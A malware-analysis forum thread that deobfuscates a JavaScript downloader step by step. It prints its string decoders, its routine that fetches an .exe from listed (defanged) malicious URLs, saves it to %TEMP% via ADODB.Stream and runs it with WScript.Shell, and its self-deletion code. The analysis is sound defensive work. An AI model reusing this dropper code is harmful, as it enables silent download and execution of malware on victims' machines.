=> The while loop will only stop as soon as this value is true, because of the if ( ! yk ) test => ! false => not false => continues​

// declaration of a function that returns 1
function Ys() {

var eT=423;
var Kjz=eT+4659;
var ShW=Kjz/42;
var oq=ShW-120;
return oq+0;

=> returns 1​

}

// declaration of a function that returns 0
function KkN() {

var Uce=201392;
var HsR=Uce+7285;
var z=HsR/399;
var Nu=z-523;
return Nu+0;

=> returns 0​

}​

• var Et = Ys(), tO = KkN();

=> Et =1
=> tO = 0​

After these parts : URLs are decoded : main loop to retrieve the payload, save it, run it.​

while (!yk)
{

if (tO > Et)
break;
// declaration of a funtion that returns "86_64" !?
function bOI() {

var JXJ=Eo("766C115776","NZNaBqBm4aZ4FpO");
return JXJ;

}

​

var EX = bOI();

=> "86_64" : not used !?

​

yk = nK(cNQ[tO], false);

=> the most important part : nK(current_URL , false)

=> Call the function with the URL as parameter 1

=> there is then no clue in the current main part of what will be made.

​

tO++;​

}​

}

var teMDEZbnTnBmTpv = 784973;

=> useless​

We have already seen that this family is like a very BIG puzzle : each function call function can can call several functions that call functions that returns and call other functions that call several functions ... with decoder, password, password obfuscated, encoded string obfuscated...

​

=> I thin with this sentence you know what I mean

I have already got into details on previous samples.

2) I Will now just show some parts !

2.1 ) The charCode decipher :

We have seen several calls of uHh function.

uHh(6527/61-0)+uHh(303/3-0)+uHh(65+17)+uHh(65+12)+uHh(36*3)+uHh(7738/73-0)+uHh(43*2)

=> Now, try to remember the previous samples :​

=> There were a very obfuscated function whose purpose was to make :​

- from charCode => String.FromCharCode(charcode+1)​

- example char "B" => its charCode : 66 => 66 + 1 => 67 => convert as string => "C" (click on ALT+67 => "C")​

It was the J() function in first sample, that called several functions that call several functions, etc ....

Let's see the uHh function : is it the same Technic ? And is it the same operations, result ?

• uHh calls another function to make its job :

function rbM(KK)
{

var H = "c" + "h" + "" + "a" + "" + "";
var Cpf = "" + "" + "" + "r" + "" + "A" + "" + "t";
return H + "" + Cpf;​

}

=> it is easy to understand it returns "charAt" => a string that represent a function used to get the char at one index on a string (index begin to 0)

​

Example :

"123456".charAt(2)

​

=> 3 !!! Because index are from 0 to length -1 : here from 0 to 5 : 6 chars !!!

=> index 2 => 3rd char

​

function uHh(vF)
{

var W = " !\"#" + "$%&" + "'()*+,-./012" + "345678" + "9:;<=>?@" + "ABC" + "DEFG";
W = W + "HIJKLMN" + "OPQRSTUVWX" + "YZ[\\]^_`abc" + "defghijk" + "lmnopqr" + "stuvwxy" + "z{|}~";
var q=37561;
var GnM=q+29960;
var lLX=GnM/317;
var AHe=lLX-182;
return W[rbM(vF)](vF-AHe);​

}

=> W : " !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~"
=> AHe : 31
=> vF : the parameter

W[rbM(vF)](vF-AHe);

=> long_string["charAt"](parameter - 31)

=> it retrieves the char from the long string, using the value_as_parameter - 31

Example :

uHh(6527/61-0)

=> 6527/61 : write this way to obfuscate the real value
=> 107 (= "k")

=> long_string["charAt"](107- 31)
=> long_string["charAt"](76)

=> "j" !!!

​

- They use an obfuscated method that is the similar to :

​

charCode => charCode -1 => String.fromCharCode()(charCode -1)
"B" charCode : => "A"​

- Previous J() was => J(charCode) =>String.fromCharCode()(value+1)

They new method :

uHh(charCode) => LIKE :String.fromCharCode()(value-1)

but retrieving the char from a string they have hard coded, after a substraction of 31 to to charCode

​

Example :

uHh(2900/58-0)+uHh(735/15+0)+uHh(3995/85-0)+uHh(3*23)+uHh(1040-993)+uHh(76-12)+uHh(19+31)+uHh(18*3)+uHh(537-486)+uHh(16+48)+uHh(32+15)+uHh(396-330)+uHh(55-7)+uHh(1734/34-0)+uHh(53)+uHh(242-195)+uHh(53)+uHh(12+35)+uHh(815-768)+uHh(2968/53-0)+uHh(4692/92-0)+uHh(146-79)+uHh(413-366)+uHh(4*13)+uHh(698-649)+uHh(3825/75+0)+uHh(2401/49-0)+uHh(4*17)+uHh(28+24)+uHh(4209/61+0)+uHh(36+14)+uHh(10*5);

uHh(2900/58-0)

=> uHh(19) : 50 => "2"

50 -31 = 19 => index => from the string => char numer 20 : "3"

=> same result with String.fromCharCode()(50+1)
​

=> "320F0A374A0C146060094D05242E5F33"

​

Conclusion :

- they have simplified a lot their charCode decipher method.
- it now subtracts 31 from the value, to get a char from a string.

=> it seems that their string has in the right order all char from blank char to ~ char

Let's try

They use:

" !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~"

​

I obtained on this MT editor with ALT+ charCode, beginning from ALT+32 :

" !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~"'

=> first char : blank char
=> \\ put for the interpreter => \
=> \" put for the interpreter => "

​

With the string they used, It is gives the same result as :

charCode => String.fromCharCode(value+1)​

​

2.2) following their function which use the URLs :

From the while loop we have seen a function that is called with current URL (two available) :​

=> nK(current_URL , false)​

this function uses : var yd = gxi(ftP);

with ftP : current_URL

function gxi(cNQ)
{
    var Nlb="";
    Nlb=Nlb+uHh(62+25)+uHh(51+27)+uHh(88+9)+uHh(8085/77+0)+uHh(5700/57-0)+uHh(361-263)+uHh(74+41);
    var VQ = vZ(Nlb);

    var UGD = zAl(VQ);
    var prv = ZQ(VQ);
    var owA="";
    owA=owA+uHh(1077-995)+uHh(508-410)+uHh(113)+uHh(21+83)+uHh(3*37)+uHh(830-715)+uHh(6968/67-0)+uHh(785-676)+uHh(38+64)+uHh(417-372)+uHh(20+49)+uHh(54+50)+uHh(107)+uHh(33+67)+uHh(57+25)+uHh(30+90)+uHh(95+19)+uHh(717-602)+uHh(29+71)+uHh(8208/76-0)+uHh(5382/69+0)+uHh(97)+uHh(10290/98+0)+uHh(20*5)+uHh(14*7)+uHh(110+5);
    var rp = new VQ(owA);
    if (ZYh(prv, cNQ) == 0)
        return false;

    var ME="";
    ME=ME+uHh(598-516)+uHh(31+84)+uHh(5376/56+0)+uHh(8740/76-0)+uHh(626-510)+uHh(6*19);
    var Br = prv[ME];
    var Is=495352;
    var OLF=Is+5272;
    var hu=OLF/536;
    var dv=hu-734;
    var DFF = dv;

    if (Br == DFF) {
        var TZj="";
        TZj=TZj+uHh(345-281)+uHh(2613/39-0)+uHh(1077-999)+uHh(60+7)+uHh(1061-996)+uHh(0+45)+uHh(57+25)+uHh(73+42)+uHh(113)+uHh(416-316)+uHh(32*3)+uHh(36*3);
        var NCu = new VQ(TZj);
        var Xlf = Ds(rp);
        var ZM="";
        ZM=ZM+uHh(1035-957)+uHh(560-449)+uHh(469-369)+uHh(700-591);
        NCu[ZM]();
        var bW="";
        bW=bW+uHh(1992/24-0)+uHh(20+100)+uHh(30+81)+uHh(20*5);
        var ghg=497350;
        var GI=ghg+15225;
        var myj=GI/725;
        var Rc=myj-706;
        NCu[bW] = Rc;

        var Ak="";
        Ak=Ak+uHh(5751/71+0)+uHh(10+90)+uHh(8892/78+0)+uHh(3*37)+uHh(10*11)+uHh(109)+uHh(9462/83+0)+uHh(312-212)+uHh(5*13)+uHh(63+47)+uHh(8217/83-0)+uHh(19+101);
        var vtX = prv[Ak];
        var Ppc="";
        Ppc=Ppc+uHh(73+13)+uHh(94+19)+uHh(8*13)+uHh(921-806)+uHh(89+11);
        NCu[Ppc](vtX);
        var kDL="";
        kDL=kDL+uHh(79)+uHh(876-766)+uHh(4674/41-0)+uHh(5408/52+0)+uHh(827-712)+uHh(8*13)+uHh(7700/70-0)+uHh(1013-904);
        var QV=108962;
        var DUj=QV+31198;
        var QZ=DUj/219;
        var AxG=QZ-640;
        NCu[kDL] = AxG;
        if (!Gg(NCu, Xlf, VQ))
            return false;

        var jgi="";
        jgi=jgi+uHh(2310/35+0)+uHh(15+92)+uHh(20+90)+uHh(93+21)+uHh(884-784);
        NCu[jgi]();
        var Bq="";
        Bq=Bq+uHh(14*7)+uHh(36*3)+uHh(805-706)+uHh(9*5)+uHh(12+88)+uHh(2975/25+0)+uHh(1034-934)+uHh(2759/89+0)+uHh(2*23)+uHh(10+88)+uHh(23+8);
        var nP = Bq + Xlf;
        var mH=48776;
        var OZ=mH+48065;
        var dad=OZ/113;
        var Yu=dad-857;
        var J = Yu;
        var mcq="";
        mcq=mcq+uHh(32*3)+uHh(4104/36+0)+uHh(7280/65-0)+uHh(36*3)+uHh(99+10)+uHh(9*11)+uHh(216-102)+uHh(87+18)+uHh(103)+uHh(24*5)+uHh(3402/63-0)+uHh(60+36)+uHh(6*17)+uHh(5353/53-0)+uHh(964-850)+uHh(133-34)+uHh(4532/44+0)+uHh(11+90)+uHh(78+36);
        var zY="";
        zY=zY+uHh(29+19)+uHh(2352/49+0)+uHh(22+27)+uHh(10*5);
        J = mn(mcq, VQ, nP, zY);

        var vk=426269;
        var gsu=vk+5797;
        var FkT=gsu/673;
        var Tp=FkT-632;
        var TAk = Tp;
        if (J < TAk)
        {
            return EB(rp);
        }
        else
        {
            return false;
        }

    }
    else {
        return false;
    }
    return true;
}

What it makes :

- decode some part with the two function we have seen : Eo and uHh
- builds the important objects

var UGD = zAl(VQ);

=> new ActiveXObject("Wscript.Shell") : to run the payload

​

var prv = ZQ(VQ);

=> new ActiveXObject("MSXML2.XMLHTTP") : to make the http request

​

var owA="";
owA=owA+uHh(1077-995)+uHh(508-410)+uHh(113)+uHh(21+83)+uHh(3*37)+uHh(830-715)+uHh(6968/67-0)+uHh(785-676)+uHh(38+64)+uHh(417-372)+uHh(20+49)+uHh(54+50)+uHh(107)+uHh(33+67)+uHh(57+25)+uHh(30+90)+uHh(95+19)+uHh(717-602)+uHh(29+71)+uHh(8208/76-0)+uHh(5382/69+0)+uHh(97)+uHh(10290/98+0)+uHh(20*5)+uHh(14*7)+uHh(110+5);

=> decoded : "Scripting.FileSystemObject"

​

var rp = new VQ(owA);

=> new ActiveXObject("Scripting.FileSystemObject") : to manipulate file / folder

​

if (ZYh(prv, cNQ) == 0)

return false;

​

=> returns false if it failed​

// Details
function ZYh(RX, ftP)
{
=> RX : is prv created above : http object
=> ftP: is the current URL (remember there are two URL available)

var lm=["9Vi","x6","odG","O","rrt","Bq","u","Q8","D8F"];
var mJ=lm[0]+lm[7]+lm[8]+lm[5]+lm[2]+lm[1]+lm[6]+lm[4]+lm[3];

=> "9ViQ8D8FBqodGx6urrtO" password to be uses with Eo decoder
​

var pOx=2081;
var ark=pOx+24803;
var TX=ark/52;
var Jl=TX-517;

=> Jl = 0;

​

RX[Eo("28451023","G5uM3YmVWOIBp")](Eo("7E133D",mJ), ftP, Jl);

=> Eo("28451023","G5uM3YmVWOIBp")

=> "open"

​

=> Eo("7E133D",mJ) => Eo("7E133D","9ViQ8D8FBqodGx6urrtO")

= > "GET"
​

=> http.open ("GET", URL, 0)

=> opens a connection to the URL
​

try {

RX[Eo("43261811","0CvugaaWl9")]();

=> Eo("43261811","0CvugaaWl9")

=> "send"

​

=> tries to send the request

​

} catch (rd) {

return 0;

=> returns 0 if an error occurred​

}
return 1;

=> returns 0 if it no error occurred​

}​

var ME="";
ME=ME+uHh(598-516)+uHh(31+84)+uHh(5376/56+0)+uHh(8740/76-0)+uHh(626-510)+uHh(6*19);

​

=> "status" => will be use to test the status from request
​

var Br = prv[ME];

=> retrieve the status value : http["status"]

=> http.status : 200 if OK, 404 if page not found, etc

​

var Is=495352;
var OLF=Is+5272;
var hu=OLF/536;
var dv=hu-734;
var DFF = dv;

=> obfuscated way to get 200

​

if (Br == DFF) {

=> it means the request was successful (good data received from the URL)

var TZj="";
TZj=TZj+uHh(345-281)+uHh(2613/39-0)+uHh(1077-999)+uHh(60+7)+uHh(1061-996)+uHh(0+45)+uHh(57+25)+uHh(73+42)+uHh(113)+uHh(416-316)+uHh(32*3)+uHh(36*3);

=> "ADODB.Stream"

​

var NCu = new VQ(TZj);

=> new ActiveXObject("ADODB.Stream") : creates a stream object to put the data received from the http request

​

var Xlf = Ds(rp);

=> function that

- creates : "\\rad256D7.tmp" : random name using GetTempName( )
- uses CreateObject("WScript.Network") :

=> provides access to the shared resources on the network to which your computer is connected

​

retrieve "UserDomain" and test if it is a string

then :

- use GetSpecialFolder(2) : %TEMP% and build the payload complete path

Example :

​

"C:\Users\\DardiM\AppData\Local\Temp\rad256D7.tmp"

​

var ZM="";
ZM=ZM+uHh(1035-957)+uHh(560-449)+uHh(469-369)+uHh(700-591);

=> "open"

​

NCu[ZM]();

=> stream.open()
=> opens the stream object to be able to manipulate it
​

var bW="";
bW=bW+uHh(1992/24-0)+uHh(20+100)+uHh(30+81)+uHh(20*5);

=> "Type"

​

var ghg=497350;
var GI=ghg+15225;
var myj=GI/725;
var Rc=myj-706;

=> Rc : 1

​

NCu[bW] = Rc;

=> stream["Type"] = 1 => binary

​

var Ak="";
Ak=Ak+uHh(5751/71+0)+uHh(10+90)+uHh(8892/78+0)+uHh(3*37)+uHh(10*11)+uHh(109)+uHh(9462/83+0)+uHh(312-212)+uHh(5*13)+uHh(63+47)+uHh(8217/83-0)+uHh(19+101);

=> "ResponseBody"

​

var vtX = prv[Ak];

=> xtX = http.ResponseBody : the data received

​

var Ppc="";
Ppc=Ppc+uHh(73+13)+uHh(94+19)+uHh(8*13)+uHh(921-806)+uHh(89+11);

=> "Write"

​

NCu[Ppc](vtX);

=> stream["Write"](data_received)
=> put the data received on the stream (remember it is on memory)

​

var kDL="";
kDL=kDL+uHh(79)+uHh(876-766)+uHh(4674/41-0)+uHh(5408/52+0)+uHh(827-712)+uHh(8*13)+uHh(7700/70-0)+uHh(1013-904);

=> "position"

​

var QV=108962;
var DUj=QV+31198;
var QZ=DUj/219;
var AxG=QZ-640;
NCu[kDL] = AxG;

=> stream.position = 0
=> put the pointer at position 0

​

if (!Gg(NCu, Xlf, VQ))

return false;

=> calls Gd(stream, Path , object_to_create_object)

Makes some stuff, bu main job :

=> stream["SaveToFile"](Path )

=> save the payload to the PC

​

Example : "C:\Users\DardiM\AppData\Local\Temp\rad6AF2B.tmp"

​

var jgi="";
jgi=jgi+uHh(2310/35+0)+uHh(15+92)+uHh(20+90)+uHh(93+21)+uHh(884-784);

=> "Close"
​

NCu[jgi]();

=> stream["close"]() => closes the stream object

​

var Bq="";
Bq=Bq+uHh(14*7)+uHh(36*3)+uHh(805-706)+uHh(9*5)+uHh(12+88)+uHh(2975/25+0)+uHh(1034-934)+uHh(2759/89+0)+uHh(2*23)+uHh(10+88)+uHh(23+8);

=> "cmd.exe /c "

​

var nP = Bq + Xlf;​

var mH=48776;

var OZ=mH+48065;
var dad=OZ/113;
var Yu=dad-857;
var J = Yu;
var mcq="";

mcq=mcq+uHh(32*3)+uHh(4104/36+0)+uHh(7280/65-0)+uHh(36*3)+uHh(99+10)+uHh(9*11)+uHh(216-102)+uHh(87+18)+uHh(103)+uHh(24*5)+uHh(3402/63-0)+uHh(60+36)+uHh(6*17)+uHh(5353/53-0)+uHh(964-850)+uHh(133-34)+uHh(4532/44+0)+uHh(11+90)+uHh(78+36);

=> "asqmndsjhy7agfsdhfs"
=> if you remember the first sample, it is a string used in a recursive function, that will finnally build the good vars and call the right run function

​

var zY="";
zY=zY+uHh(29+19)+uHh(2352/49+0)+uHh(22+27)+uHh(10*5);

=> "1123"

​

J = mn(mcq, VQ, nP, zY);

=> the function that will run the payload

=> return hkG(hsb, t, PcU, UVS);

=> return hkG(25, ActiveXObject , cmd_for_the_run, "run");

Example :

"cmd.exe /c C:\Users\DardiM\AppData\Local\Temp\rad6AF2B.tmp"

​

function hkG(wvj, t, PcU, UVS)
{

var T=237014;
var JE=T+279;
var oVt=JE/311;
var zV=oVt-763;
var s = zV;
if (wvj > s)
{

wvj = s;​

}
var Gy=["J","ft","A7","M8","kY","F8J","RMc","8","X","e"];
var Wy=Gy[1]+Gy[9]+Gy[4]+Gy[5]+Gy[3]+Gy[7]+Gy[8]+Gy[6]+Gy[2]+Gy[0];
var r = Eo("1513010131274B2D255C52",Wy);
r = new t(Eo("1C3A2F3800223B793932292725","KILJiROWjZL"));

=> new ActiveXObject("Wscript.Shell")

​

r[UVS](PcU, wvj);

=> shell.run is used here !

Example :

=> r["run"]( "cmd.exe /c C:\Users\DardiM\AppData\Local\Temp\rad6AF2B.tmp", 0);

​

var bAJ=236943;
var K=bAJ+15777;
var hKK=K/585;
var uo=hKK-424;
var Vvx = uo;
return Vvx;​

}

​

var vk=426269;
var gsu=vk+5797;
var FkT=gsu/673;
var Tp=FkT-632;
var TAk = Tp;
if (J < TAk)
{

return EB(rp);

function EB(Cj, ym)
{

var Dk = eval(Eo("601B0B105E463C","7Hhb76HhB8KVzROI"));

=> eval("WScript")

=> Dk : object WScript​

var yF = Dk[Eo("3915141A333533040403190A382B","jvfsCAuqhoWkUN2")];

=> yF = WScript["ScriptFullName"]

=> get the current running script full name : complete path+ name

Example :

=> "C:\Users\DardiM\Desktop\\13012017_22\\¦¬¦-¦+¦-¦¬¦¦¦¦¦-¦-¦-TБTВTМ_23xls.js"

​

var Zz="";
Zz=Zz+uHh(11*11)+uHh(42+10)+uHh(48+35)+uHh(6560/80+0)+uHh(7+113)+uHh(647-530)+uHh(890-813)+uHh(877-792)+uHh(3102/66+0)+uHh(67+49)+uHh(4664/44+0)+uHh(883-785)+uHh(53*2)+uHh(904-855);

=> "deleteFile"

​

Cj[Eo("1E5038360D13083F5C10",Zz)](yF);

=> FileSystemObject object is used (was created at the top of this part)

=> fso["deleteFile"](script_path)

=> it deletes the current running script file

​

return true;​

}​

}
else
{

return false;​

}
}​

else {

return false;
}

return true;​

}

​

3) Remarks :

- Some modifications compared to previous version.

- The URLs used in this post don't work anymore

- hxxp://laurinahlimited.com/systwin.exe
- hxxp://milavitsa21.ru/systwin.exe​

- I have not shown sub-functions when 0 methods change have been made
​

 

[Svoll]

DardiM said: ↑
"3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611"
"S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO"

"3F" => 63
"K" => 75
=> 63 XOR 75 = 116 => "t"
current decoded string : "htt"
etc,...
RESULTS :

cI();

=> "http ://www .interlaan.com/deklar_11222016.exe"
WE();

=> "http ://dipudevaraj.com/deklar_11222016.exe"



This is amazing fun to decode! Thank you for another fun puzzle!

each time you make an updated summary, I go back to the old one for reference and find new things i missed the first time reading it.

 

[DardiM]

DardiM said: ↑
"3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611"
"S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO"

"3F" => 63
"K" => 75
=> 63 XOR 75 = 116 => "t"
current decoded string : "htt"
etc,...
RESULTS :

cI();

=> "http ://www .interlaan.com/deklar_11222016.exe"
WE();

=> "http ://dipudevaraj.com/deklar_11222016.exe"



This is amazing fun to decode! Thank you for another fun puzzle!

each time you make an updated summary, I go back to the old one for reference and find new things i missed the first time reading it.

Thanks

Yes it is better to look at the first post, before :

=> Because in this last post, I didn't show again some parts already explained in details in the first post.

But this way the last post seems a bit less complex to be read​

 

[DardiM]

Formatting bug again , once posted => some random blank lines have disappeared.
I have just edited the post to add the lost blank lines ...
=> I hope I have not forget some parts.
(A big problem this bug : each time I edit the post to correct : hop some blank lines turn to disappear again ...)

 

[Svoll]

Formatting bug again , once posted => some random blank lines have disappeared.
I have just edited the post to add the lost blank lines ...
=> I hope I have not forget some parts.
(A big problem this bug : each time I edit the post to correct : hop some blank lines turn to disappear again ...)

cough cough ScreenShot (comment on Notepad++ and SS) <-- also prevents copy + paste + infection

 

[DardiM]

cough cough ScreenShot (comment on Notepad++ and SS) <-- also prevents copy + paste + infection

That is a good idea

The only problem is picture file length / size in comparison with formatted text

I am really exhausted of having to save / edit / save / edit , like a for (var i = 0 ; i < unknown value ; i++) {....} , and each time have to read the whole post line by line to find and correct all the deleted blank lines ... save ... and hop others blank lines vanished...

May be a double loop ...

Imagine also when I try to correct the numerous English mistakes => hop same bug, lol.